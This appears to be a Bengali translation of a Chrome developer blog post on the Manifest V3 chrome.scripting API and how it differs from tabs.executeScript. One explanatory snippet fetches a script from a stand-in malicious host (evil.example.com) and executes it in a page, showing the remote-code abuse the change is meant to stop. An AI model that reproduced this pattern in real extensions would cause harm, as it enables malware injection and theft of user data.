ম্যানিফেস্ট V3 Chrome এর এক্সটেনশন প্ল্যাটফর্মে বেশ কিছু পরিবর্তন এনেছে। এই পোস্টে, আমরা আরও উল্লেখযোগ্য পরিবর্তনগুলির মধ্যে একটি দ্বারা প্রবর্তিত প্রেরণা এবং পরিবর্তনগুলি অন্বেষণ করব: chrome.scripting
API-এর প্রবর্তন৷
chrome.scripting কি?
নামটি সুপারিশ করতে পারে, chrome.scripting
হল ম্যানিফেস্ট V3-এ প্রবর্তিত একটি নতুন নামস্থান যা স্ক্রিপ্ট এবং স্টাইল ইনজেকশন ক্ষমতার জন্য দায়ী৷
যে ডেভেলপাররা অতীতে ক্রোম এক্সটেনশন তৈরি করেছেন তারা ট্যাব এপিআই- এ chrome.tabs.executeScript
এবং chrome.tabs.insertCSS
মতো ম্যানিফেস্ট V2 পদ্ধতির সাথে পরিচিত হতে পারেন। এই পদ্ধতিগুলি এক্সটেনশনগুলিকে যথাক্রমে পৃষ্ঠাগুলিতে স্ক্রিপ্ট এবং স্টাইলশীটগুলি ইনজেক্ট করার অনুমতি দেয়। ম্যানিফেস্ট V3-এ, এই ক্ষমতাগুলি chrome.scripting
এ চলে গেছে এবং আমরা ভবিষ্যতে কিছু নতুন ক্ষমতা সহ এই API প্রসারিত করার পরিকল্পনা করছি৷
কেন একটি নতুন API তৈরি করবেন?
এই ধরনের পরিবর্তনের সাথে, প্রথম প্রশ্নগুলির মধ্যে একটি যা আসতে থাকে, "কেন?"
কয়েকটি ভিন্ন কারণের কারণে ক্রোম টিম স্ক্রিপ্টিংয়ের জন্য একটি নতুন নামস্থান চালু করার সিদ্ধান্ত নিয়েছে। প্রথমত, ট্যাবস এপিআই বৈশিষ্ট্যগুলির জন্য কিছুটা জাঙ্ক ড্রয়ার। দ্বিতীয়ত, আমাদের বিদ্যমান executeScript
API-এ ব্রেকিং পরিবর্তন করতে হবে। তৃতীয়ত, আমরা জানতাম যে আমরা এক্সটেনশনের জন্য স্ক্রিপ্টিং ক্ষমতা প্রসারিত করতে চাই। একসাথে, এই উদ্বেগগুলি পরিষ্কারভাবে হাউস স্ক্রিপ্টিং ক্ষমতার জন্য একটি নতুন নামস্থানের প্রয়োজনীয়তাকে সংজ্ঞায়িত করেছে।
জাঙ্ক ড্রয়ার
বিগত কয়েক বছর ধরে এক্সটেনশন টিমকে যে সমস্যাটি বিরক্ত করছে তার মধ্যে একটি হল chrome.tabs
API ওভারলোড। যখন এই APIটি প্রথম চালু করা হয়েছিল, এটি প্রদান করা ক্ষমতাগুলির বেশিরভাগই একটি ব্রাউজার ট্যাবের বিস্তৃত ধারণার সাথে সম্পর্কিত ছিল। এমনকি সেই মুহুর্তে, যদিও, এটি বৈশিষ্ট্যগুলির কিছুটা দখলের ব্যাগ ছিল এবং বছরের পর বছর ধরে এই সংগ্রহটি কেবল বেড়েছে।
ম্যানিফেস্ট V3 প্রকাশের সময়, ট্যাবস এপিআই বেসিক ট্যাব ম্যানেজমেন্ট, সিলেকশন ম্যানেজমেন্ট, উইন্ডো অর্গানাইজেশন, মেসেজিং, জুম কন্ট্রোল, বেসিক নেভিগেশন, স্ক্রিপ্টিং এবং আরও কয়েকটি ছোট ক্ষমতা কভার করার জন্য বেড়েছে। যদিও এই সবগুলি গুরুত্বপূর্ণ, এটি বিকাশকারীদের জন্য কিছুটা অপ্রতিরোধ্য হতে পারে যখন তারা শুরু করছে এবং Chrome টিমের জন্য আমরা প্ল্যাটফর্মটি বজায় রাখি এবং বিকাশকারী সম্প্রদায়ের অনুরোধগুলি বিবেচনা করি৷
আরেকটি জটিল কারণ হল যে tabs
অনুমতি ভালভাবে বোঝা যায় না। যদিও অন্যান্য অনেক অনুমতি একটি প্রদত্ত API (যেমন storage
) অ্যাক্সেস সীমাবদ্ধ করে, এই অনুমতিটি কিছুটা অস্বাভাবিক যে এটি শুধুমাত্র ট্যাব দৃষ্টান্তগুলিতে সংবেদনশীল বৈশিষ্ট্যগুলিতে এক্সটেনশন অ্যাক্সেস মঞ্জুর করে (এবং এক্সটেনশন দ্বারা উইন্ডোজ API-কেও প্রভাবিত করে)। বোধগম্যভাবে, অনেক এক্সটেনশন ডেভেলপাররা ভুল করে ভাবেন যে তাদের ট্যাব এপিআই-এ chrome.tabs.create
বা আরও জার্মানভাবে, chrome.tabs.executeScript
মতো পদ্ধতিগুলি অ্যাক্সেস করার জন্য এই অনুমতি প্রয়োজন। ট্যাব এপিআই থেকে কার্যকারিতা সরানো এই বিভ্রান্তির কিছু দূর করতে সাহায্য করে।
ব্রেকিং পরিবর্তন
ম্যানিফেস্ট V3 ডিজাইন করার সময়, একটি প্রধান সমস্যা যা আমরা সমাধান করতে চেয়েছিলাম তা হল অপব্যবহার এবং "রিমোট-হোস্টেড কোড" দ্বারা সক্রিয় ম্যালওয়্যার - কোড যা এক্সিকিউট করা হয়, কিন্তু এক্সটেনশন প্যাকেজে অন্তর্ভুক্ত নয়। অপমানজনক এক্সটেনশন লেখকদের কাছে ব্যবহারকারীর ডেটা চুরি করতে, ম্যালওয়্যার ইনজেক্ট করতে এবং সনাক্তকরণ এড়াতে দূরবর্তী সার্ভার থেকে আনা স্ক্রিপ্টগুলি কার্যকর করা সাধারণ৷ যদিও ভাল অভিনেতারাও এই ক্ষমতা ব্যবহার করে, আমরা শেষ পর্যন্ত অনুভব করেছি যে এটি যেমন ছিল তেমন থাকা খুব বিপজ্জনক।
এক্সটেনশনগুলি আনবান্ডেড কোড কার্যকর করতে পারে এমন কয়েকটি ভিন্ন উপায় রয়েছে, তবে এখানে প্রাসঙ্গিকটি হল Manifest V2 chrome.tabs.executeScript
পদ্ধতি। এই পদ্ধতিটি একটি এক্সটেনশনকে একটি লক্ষ্য ট্যাবে কোডের একটি নির্বিচারে স্ট্রিং চালানোর অনুমতি দেয়। এর মানে হল যে একজন দূষিত বিকাশকারী একটি দূরবর্তী সার্ভার থেকে একটি নির্বিচারে স্ক্রিপ্ট আনতে পারে এবং এক্সটেনশনটি অ্যাক্সেস করতে পারে এমন যেকোনো পৃষ্ঠার ভিতরে এটি কার্যকর করতে পারে। আমরা জানতাম যে আমরা যদি দূরবর্তী কোড সমস্যাটি সমাধান করতে চাই তবে আমাদের এই বৈশিষ্ট্যটি বাদ দিতে হবে।
(async function() {
let result = await fetch('https://evil.example.com/malware.js');
let script = await result.text();
chrome.tabs.executeScript({
code: script,
});
})();
আমরা ম্যানিফেস্ট V2 সংস্করণের ডিজাইনের সাথে আরও কিছু, আরও সূক্ষ্ম সমস্যাগুলি পরিষ্কার করতে এবং এপিআইকে আরও পালিশ এবং অনুমানযোগ্য টুল বানাতে চেয়েছিলাম।
যদিও আমরা ট্যাবস এপিআই-এর মধ্যে এই পদ্ধতির স্বাক্ষর পরিবর্তন করতে পারতাম, আমরা অনুভব করেছি যে এই ব্রেকিং পরিবর্তন এবং নতুন ক্ষমতার প্রবর্তনের মধ্যে (পরবর্তী বিভাগে কভার করা হয়েছে), একটি পরিষ্কার বিরতি সবার জন্য সহজ হবে।
স্ক্রিপ্টিং ক্ষমতা প্রসারিত করা
আরেকটি বিবেচনা যা ম্যানিফেস্ট V3 ডিজাইন প্রক্রিয়ার মধ্যে দেওয়া হয়েছিল তা হল Chrome এর এক্সটেনশন প্ল্যাটফর্মে অতিরিক্ত স্ক্রিপ্টিং ক্ষমতা চালু করার ইচ্ছা। বিশেষত, আমরা গতিশীল বিষয়বস্তু স্ক্রিপ্টগুলির জন্য সমর্থন যোগ করতে এবং executeScript
পদ্ধতির ক্ষমতা প্রসারিত করতে চেয়েছিলাম।
ডায়নামিক কন্টেন্ট স্ক্রিপ্ট সমর্থন Chromium-এ একটি দীর্ঘস্থায়ী বৈশিষ্ট্য অনুরোধ। আজ, ম্যানিফেস্ট V2 এবং V3 ক্রোম এক্সটেনশনগুলি শুধুমাত্র স্ট্যাটিকভাবে তাদের manifest.json
ফাইলে কন্টেন্ট স্ক্রিপ্ট ঘোষণা করতে পারে; প্ল্যাটফর্মটি নতুন বিষয়বস্তু স্ক্রিপ্ট নিবন্ধন করার একটি উপায় প্রদান করে না, বিষয়বস্তু স্ক্রিপ্ট নিবন্ধন পরিবর্তন, বা রানটাইমে বিষয়বস্তু স্ক্রিপ্টগুলি আনরেজিস্টার করে।
যদিও আমরা জানতাম যে আমরা ম্যানিফেস্ট V3-তে এই বৈশিষ্ট্যের অনুরোধটি মোকাবেলা করতে চাই, আমাদের বিদ্যমান API-এর কোনোটিই সঠিক বাড়ির মতো মনে হয়নি। We also considered aligning with Firefox on their Content Scripts API , but very early on we identified a couple major drawbacks to this approach. প্রথমত, আমরা জানতাম যে আমাদের অসঙ্গত স্বাক্ষর থাকবে (যেমন code
সম্পত্তির জন্য সমর্থন বাদ দেওয়া)। দ্বিতীয়ত, আমাদের এপিআই-এর ডিজাইনের সীমাবদ্ধতার একটি ভিন্ন সেট ছিল (যেমন একজন পরিষেবা কর্মীর জীবনকাল অতিক্রম করার জন্য একটি নিবন্ধন প্রয়োজন)। অবশেষে, এই নেমস্পেসটি আমাদেরকে কন্টেন্ট স্ক্রিপ্ট কার্যকারিতাতেও ঢেলে দেবে যেখানে আমরা আরও বিস্তৃতভাবে এক্সটেনশনে স্ক্রিপ্ট করার কথা ভাবছি।
executeScript
ফ্রন্টে, আমরা ট্যাবস এপিআই সংস্করণ যা সমর্থিত তার বাইরেও এই API কী করতে পারে তা প্রসারিত করতে চেয়েছিলাম। আরও নির্দিষ্টভাবে, আমরা ফাংশন এবং আর্গুমেন্ট সমর্থন করতে চেয়েছিলাম, আরও সহজে নির্দিষ্ট ফ্রেমগুলিকে লক্ষ্য করতে এবং অ-"ট্যাব" প্রসঙ্গগুলিকে লক্ষ্য করতে চেয়েছিলাম।
এগিয়ে চলছি, আমরা এটাও বিবেচনা করছি যে কীভাবে এক্সটেনশানগুলি ইনস্টল করা PWA এবং অন্যান্য প্রসঙ্গগুলির সাথে ইন্টারঅ্যাক্ট করতে পারে যা ধারণাগতভাবে "ট্যাব"-এ ম্যাপ করে না।
tabs.executeScript এবং scripting.executeScript-এর মধ্যে পরিবর্তন
এই পোস্টের বাকি অংশে, আমি chrome.tabs.executeScript
এবং chrome.scripting.executeScript
মধ্যে মিল এবং পার্থক্যগুলি ঘনিষ্ঠভাবে দেখতে চাই।
আর্গুমেন্ট সহ একটি ফাংশন ইনজেকশন করা
দূরবর্তীভাবে হোস্ট করা কোড বিধিনিষেধের আলোকে প্ল্যাটফর্মটি কীভাবে বিকশিত হতে হবে তা বিবেচনা করার সময়, আমরা নির্বিচারে কোড এক্সিকিউশন এবং শুধুমাত্র স্ট্যাটিক কন্টেন্ট স্ক্রিপ্টের অনুমতি দেওয়ার মধ্যে একটি ভারসাম্য খুঁজে পেতে চেয়েছিলাম। আমরা যে সমাধানটি করেছি তা হল এক্সটেনশনকে একটি বিষয়বস্তু স্ক্রিপ্ট হিসাবে একটি ফাংশন ইনজেক্ট করার অনুমতি দেওয়া এবং আর্গুমেন্ট হিসাবে মানগুলির একটি অ্যারে পাস করা৷
আসুন একটি (অত্যধিক সরলীকৃত) উদাহরণটি দ্রুত দেখে নেওয়া যাক। বলুন যে আমরা একটি স্ক্রিপ্ট ইনজেক্ট করতে চেয়েছিলাম যা ব্যবহারকারীকে যখন এক্সটেনশনের অ্যাকশন বোতামে ক্লিক করে (টুলবারে আইকন) তখন নাম দিয়ে অভিবাদন জানায়। ম্যানিফেস্ট V2-এ, আমরা গতিশীলভাবে একটি কোড স্ট্রিং তৈরি করতে পারি এবং বর্তমান পৃষ্ঠায় সেই স্ক্রিপ্টটি কার্যকর করতে পারি।
// Manifest V2 extension
chrome.browserAction.onClicked.addListener(async (tab) => {
let userReq = await fetch('https://example.com/greet-user.js');
let userScript = await userReq.text();
chrome.tabs.executeScript({
// userScript == 'alert("Hello, <GIVEN_NAME>!")'
code: userScript,
});
});
যদিও ম্যানিফেস্ট V3 এক্সটেনশনগুলি এমন কোড ব্যবহার করতে পারে না যা এক্সটেনশনের সাথে বান্ডিল নয়, আমাদের লক্ষ্য ছিল কিছু গতিশীলতা রক্ষা করা যা ম্যানিফেস্ট V2 এক্সটেনশনগুলির জন্য স্বেচ্ছাচারী কোড ব্লকগুলি সক্ষম করে। ফাংশন এবং আর্গুমেন্ট পন্থা ক্রোম ওয়েব স্টোরের পর্যালোচক, ব্যবহারকারী এবং অন্যান্য আগ্রহী পক্ষের জন্য এক্সটেনশনের ঝুঁকিগুলিকে আরও সঠিকভাবে মূল্যায়ন করা সম্ভব করে তোলে যখন ডেভেলপারদের ব্যবহারকারীর সেটিংস বা অ্যাপ্লিকেশন অবস্থার উপর ভিত্তি করে একটি এক্সটেনশনের রানটাইম আচরণ পরিবর্তন করার অনুমতি দেয়৷
// Manifest V3 extension
function greetUser(name) {
alert(`Hello, ${name}!`);
}
chrome.action.onClicked.addListener(async (tab) => {
let userReq = await fetch('https://example.com/user-data.json');
let user = await userReq.json();
let givenName = user.givenName || '<GIVEN_NAME>';
chrome.scripting.executeScript({
target: {tabId: tab.id},
func: greetUser,
args: [givenName],
});
});
টার্গেটিং ফ্রেম
আমরা আরও উন্নত করতে চেয়েছিলাম যে কীভাবে বিকাশকারীরা সংশোধিত API-এ ফ্রেমের সাথে ইন্টারঅ্যাক্ট করে। executeScript
ম্যানিফেস্ট V2 সংস্করণটি ডেভেলপারদের একটি ট্যাবের সমস্ত ফ্রেম বা ট্যাবের একটি নির্দিষ্ট ফ্রেমকে লক্ষ্য করার অনুমতি দেয়৷ একটি ট্যাবে সমস্ত ফ্রেমের তালিকা পেতে আপনি chrome.webNavigation.getAllFrames
ব্যবহার করতে পারেন৷
// Manifest V2 extension
chrome.browserAction.onClicked.addListener((tab) => {
chrome.webNavigation.getAllFrames({tabId: tab.id}, (frames) => {
let frame1 = frames[0].frameId;
let frame2 = frames[1].frameId;
chrome.tabs.executeScript(tab.id, {
frameId: frame1,
file: 'content-script.js',
});
chrome.tabs.executeScript(tab.id, {
frameId: frame2,
file: 'content-script.js',
});
});
});
ম্যানিফেস্ট V3-এ, আমরা অপশন অবজেক্টের ঐচ্ছিক frameId
পূর্ণসংখ্যা বৈশিষ্ট্যটিকে একটি ঐচ্ছিক frameIds
পূর্ণসংখ্যার অ্যারে দিয়ে প্রতিস্থাপন করেছি; এটি ডেভেলপারদের একটি একক API কলে একাধিক ফ্রেমকে লক্ষ্য করতে দেয়।
// Manifest V3 extension
chrome.action.onClicked.addListener(async (tab) => {
let frames = await chrome.webNavigation.getAllFrames({tabId: tab.id});
let frame1 = frames[0].frameId;
let frame2 = frames[1].frameId;
chrome.scripting.executeScript({
target: {
tabId: tab.id,
frameIds: [frame1, frame2],
},
files: ['content-script.js'],
});
});
স্ক্রিপ্ট ইনজেকশন ফলাফল
ম্যানিফেস্ট V3-এ আমরা স্ক্রিপ্ট ইনজেকশনের ফলাফল ফেরানোর উপায়ও উন্নত করেছি। একটি "ফলাফল" মূলত একটি স্ক্রিপ্টে মূল্যায়ন করা চূড়ান্ত বিবৃতি। আপনি যখন eval()
কল করেন বা Chrome DevTools কনসোলে কোডের একটি ব্লক এক্সিকিউট করেন, তবে প্রসেস জুড়ে ফলাফলগুলি পাস করার জন্য ক্রমিকভাবে ক্রমিকভাবে কল করার সময় প্রত্যাবর্তিত মানটির মতো মনে করুন।
ম্যানিফেস্ট V2-এ, executeScript
এবং insertCSS
প্লেইন এক্সিকিউশন ফলাফলের একটি অ্যারে ফিরিয়ে দেবে। আপনার যদি শুধুমাত্র একটি ইঞ্জেকশন পয়েন্ট থাকে তবে এটি ঠিক আছে, তবে একাধিক ফ্রেমে ইনজেকশন দেওয়ার সময় ফলাফলের ক্রম নিশ্চিত করা হয় না তাই কোন ফলাফলটি কোন ফ্রেমের সাথে যুক্ত তা বলার কোন উপায় নেই৷
একটি সুনির্দিষ্ট উদাহরণের জন্য, আসুন একটি ম্যানিফেস্ট V2 এবং একই এক্সটেনশনের একটি ম্যানিফেস্ট V3 সংস্করণ দ্বারা প্রত্যাবর্তিত results
অ্যারেগুলি একবার দেখে নেওয়া যাক। এক্সটেনশনের উভয় সংস্করণ একই বিষয়বস্তু স্ক্রিপ্ট ইনজেক্ট করবে এবং আমরা একই ডেমো পৃষ্ঠায় ফলাফল তুলনা করব।
// content-script.js
var headers = document.querySelectorAll('p');
headers.length;
যখন আমরা ম্যানিফেস্ট V2 সংস্করণ চালাই, তখন আমরা [1, 0, 5]
এর একটি অ্যারে ফিরে পাই। কোন ফলাফল প্রধান ফ্রেমের সাথে মিলে যায় এবং কোনটি iframe এর জন্য? রিটার্ন মান আমাদের বলে না, তাই আমরা নিশ্চিতভাবে জানি না।
// Manifest V2 extension
chrome.browserAction.onClicked.addListener((tab) => {
chrome.tabs.executeScript({
allFrames: true,
file: 'content-script.js',
}, (results) => {
// results == [1, 0, 5]
for (let result of results) {
if (result > 0) {
// Do something with the frame... which one was it?
}
}
});
});
ম্যানিফেস্ট V3 সংস্করণে, results
এখন শুধুমাত্র মূল্যায়নের ফলাফলের অ্যারের পরিবর্তে ফলাফল বস্তুর একটি অ্যারে রয়েছে এবং ফলাফল বস্তুগুলি প্রতিটি ফলাফলের জন্য ফ্রেমের আইডি স্পষ্টভাবে সনাক্ত করে। এটি ডেভেলপারদের জন্য ফলাফলটি ব্যবহার করা এবং একটি নির্দিষ্ট ফ্রেমে পদক্ষেপ নেওয়া অনেক সহজ করে তোলে।
// Manifest V3 extension
chrome.action.onClicked.addListener(async (tab) => {
let results = await chrome.scripting.executeScript({
target: {tabId: tab.id, allFrames: true},
files: ['content-script.js'],
});
// results == [
// {frameId: 0, result: 1},
// {frameId: 1235, result: 5},
// {frameId: 1234, result: 0}
// ]
for (let result of results) {
if (result.result > 0) {
console.log(`Found ${result} p tag(s) in frame ${result.frameId}`);
// Found 1 p tag(s) in frame 0
// Found 5 p tag(s) in frame 1235
}
}
});
গুটিয়ে নিন
ম্যানিফেস্ট সংস্করণ বাম্পগুলি এক্সটেনশন APIগুলিকে পুনর্বিবেচনা এবং আধুনিকীকরণের একটি বিরল সুযোগ উপস্থাপন করে৷ ম্যানিফেস্ট V3-এর সাথে আমাদের লক্ষ্য হল এক্সটেনশনগুলিকে আরও নিরাপদ করার পাশাপাশি ডেভেলপারের অভিজ্ঞতার উন্নতির মাধ্যমে শেষ ব্যবহারকারীর অভিজ্ঞতা উন্নত করা। Manifest V3-এ chrome.scripting
প্রবর্তন করার মাধ্যমে, আমরা Tabs API পরিষ্কার করতে, আরও নিরাপদ এক্সটেনশন প্ল্যাটফর্মের জন্য executeScript
পুনরায় কল্পনা করতে এবং নতুন স্ক্রিপ্টিং ক্ষমতার ভিত্তি স্থাপন করতে সক্ষম হয়েছি যা এই বছরের শেষের দিকে আসবে৷